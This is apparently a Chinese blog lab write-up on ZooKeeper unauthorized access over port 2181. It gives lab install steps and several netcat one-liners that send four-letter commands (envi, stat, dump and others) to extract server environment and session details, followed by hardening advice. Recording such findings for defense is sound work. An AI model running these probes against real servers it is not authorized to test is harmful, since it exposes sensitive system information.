ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)
漏洞简介
- ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,是Hadoop和Hbase的重要组件。它是一个为分布式应用提供一致性服务的软件,提供的功能包括:配置维护、域名服务、分布式同步、组服务等。
- ZooKeeper默认开启在
2181
端口,在未进行任何访问控制情况下,攻击者可通过执行envi
命令获得系统大量的敏感信息,包括系统名称、Java环境。
环境搭建
测试机:Kali
靶机:Ubuntu
版本:zookeeper-3.4.14
安装命令如下:
mwget http://archive.apache.org/dist/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14.tar.gz
tar -xzvf zookeeper-3.4.14.tar.gz
cd zookeeper-3.4.14/conf
mv zoo_sample.cfg zoo.cfg
../bin/zkServer.sh start # 启动
搭建成功~~默认端口2181
漏洞证明
获取该服务器的环境
echo envi|nc 192.168.246.130 2181
漏洞利用
通过执行envi命令获得系统大量的敏感信息,包括系统名称、Java环境。
1、stat:列出关于性能和连接的客户端的统计信息。
echo stat |ncat 127.0.0.1 2181
2、ruok:测试服务器是否运行在非错误状态。
echo ruok |ncat 127.0.0.1 2181
3、reqs:列出未完成的请求。
echo reqs |ncat 127.0.0.1 2181
4、envi:打印有关服务环境的详细信息。
echo envi |ncat 127.0.0.1 2181
5、dump:列出未完成的会话和临时节点。
echo dump |ncat 127.0.0.1 2181
防御手段
1、修改 ZooKeeper 默认端口,采用其他端口服务。
2、添加访问控制,配置服务来源地址限制策略。
3、增加 ZooKeeper 的认证配置。
ZooKeeper未授权访问漏洞记录(影响范围:全版本,端口:2181)相关推荐
- Alibaba Druid未授权访问漏洞记录(敏感目录,端口:不确定)
Druid简介 1.Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池. 2.Druid提供的监控功能,监控SQL的执行时间.监控Web URI的请求.Session监控. Druid可能 ...
- MongoDB未授权访问漏洞记录(端口:27017,37017)
一.漏洞危害 对外开放的MongoDB服务,未配置访问认证授权,无需认证连接数据库后对数据库进行任意操作(增.删.改.查高危动作),存在严重的数据泄露风险. 二.漏洞成因 MongoDB服务安装后,默 ...
- ZooKeeper 未授权访问漏洞利用
点击"仙网攻城狮"关注我们哦~ 不当想研发的渗透人不是好运维 让我们每天进步一点点 简介 ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,它是一个为分布式应用提 ...
- Redis未授权访问漏洞记录(端口:6379)
目录 Redis 扫描 未授权登录以及利用 写入SSH公钥,进行远程登录 定时任务反弹shell 写入一句话木马 其它一句话木马 写入/etc/passwd文件 利用主从复制RCE 本地Red ...
- ZooKeeper未授权访问漏洞确认与修复
文章目录 探测2181 探测四字命令 用安装好zk环境的客户端连接测试 修复 修复步骤一 关闭四字命令 修复步骤二 关闭未授权访问 zookeeper未授权访问测试参考文章: https://www. ...
- Rsync未授权访问漏洞记录(影响范围:全版本,端口:873)
1. 漏洞介绍及危害 Rsync(remote synchronize)是一个远程数据同步工具,可通过 LAN/WAN 快速同步多台主机间的文件,也可以同步本地硬盘中的不同目录.Rsync 默认允许匿 ...
- Jboss未授权访问漏洞记录(影响版本:全版本,端口:80,8080)
一.前言 漏洞原因:在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码. 二.环境配置 使用docker搭建环境 ...
- CouchDB未授权访问漏洞记录(端口:5984、6984,CVE-2017-12635,CVE-2017-12636)复现失败
复现exp失败 漏洞简介以及危害 Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库".它是一个使用JSON作为存储格式,JavaScript ...
- jenkins未授权访问漏洞记录(端口:7001,80,8080,50000)
一.漏洞描述 未授权访问管理控制台,可以通过脚本命令行执行系统命令.通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件. 二.漏洞环境搭建 ...
最新文章
- MFC EDIT控件 接收“回车”与“ESC”键 退出问题!
- 容器生态系统 (续) - 每天5分钟玩转容器技术(3)
- Machinations——可视化游戏设计
- 《零基础》MySQL 查询数据(十二)
- VMware Esxi-5.1 简介与安装
- 使用pjsip传输已经编码的视频,源码在github
- Oracle 存储过程笔记.
- 荣耀V8鸿蒙系统刷机包,华为荣耀V8原版rom系统刷机包_荣耀V8最新版升级包更新下载...
- 新唐单片机选型手册_Nuvoton新唐8位8051单片机选型指南
- 人保爱无忧易核版重疾险怎么样?好不好?
- 获取java时间 小时_Java 如何获取当前时间前一个小时的时间
- 事情往往不是想的那么糟
- 深信服EDR终端检测平台-RCE漏洞复现
- 如何提取视频中的音频,不需要软件,在线就能做到
- linux中解压rar文件
- RT-thread初学
- 数学不好,进入机器学习领域还有戏吗?
- innodb的索引下推
- checkbox label
- centos6.6下安装moxa多串口卡(cp-168u v2.1)
热门文章
- 卷积神经网络CNN(8)—— Pix2Pix Application -- Aerialmap Lane Line Detection (Pix2Pix应用:航拍图车道线检测)
- 如何火眼金睛鉴定那些单细胞转录组中的混杂因素
- Caret模型训练和调参更多参数解读(2)
- NGS基础 - 参考基因组和基因注释文件
- 基础省选+NOI-第2部分 数据结构进阶(II)
- 《计算机应用基础》18春作业,【北语网院】18春《计算机应用基础》作业_4.pdf...
- 【ES6(2015)】Module模块
- ThinkPHP6项目基操(2.Nginx配置虚拟域名及简化访问路径)
- java统计字符串中每个字符出现的次数_统计字符串出现的次数
- Java笔记-对称加密AES的使用